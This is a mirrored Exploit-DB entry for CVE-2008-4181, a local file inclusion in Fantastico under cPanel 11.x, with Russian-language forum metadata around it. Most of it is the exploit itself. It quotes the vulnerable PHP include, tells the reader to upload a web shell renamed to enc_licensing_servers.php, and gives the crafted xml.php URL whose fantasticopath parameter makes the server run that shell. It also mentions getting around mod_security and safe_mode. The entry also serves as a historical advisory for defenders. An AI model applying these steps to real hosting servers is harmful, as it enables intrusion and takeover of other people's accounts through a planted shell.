- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6461
- Проверка EDB
-
- Пройдено
- Автор
- JOKER_1
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4181
- Дата публикации
- 2008-09-14
Код:
##############################################################
Fantastico In all Version Cpanel 11.x <= local File Include
##############################################################
Must login to :2082
To break the protection mod_security & safe_mode: off & Disable functions : all none
Vulnerable Code
$licensing_servers=$fantasticopath . "/includes/enc_licensing_servers.php";
if (is_file($licensing_servers))
{
include($licensing_servers);
in
http://xx.com:2082/frontend/x/fantastico/includes/xml.php
Exploit >>
First Create directory Let the name /includes/ and upload Shell.php in /includes/ Then rename it to enc_licensing_servers.php
:::xploit::::
http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user
###################################################
Discoverd By : joker_1
for info : [email protected]
###################################################
Special Greetings :- sniper-sa.com & Group XP & Alm3reFh.Com & Genral kbkb & step on the snow & red trigger & qalbhamad & saudi star
###################################################
# milw0rm.com [2008-09-14]- Источник
- www.exploit-db.com
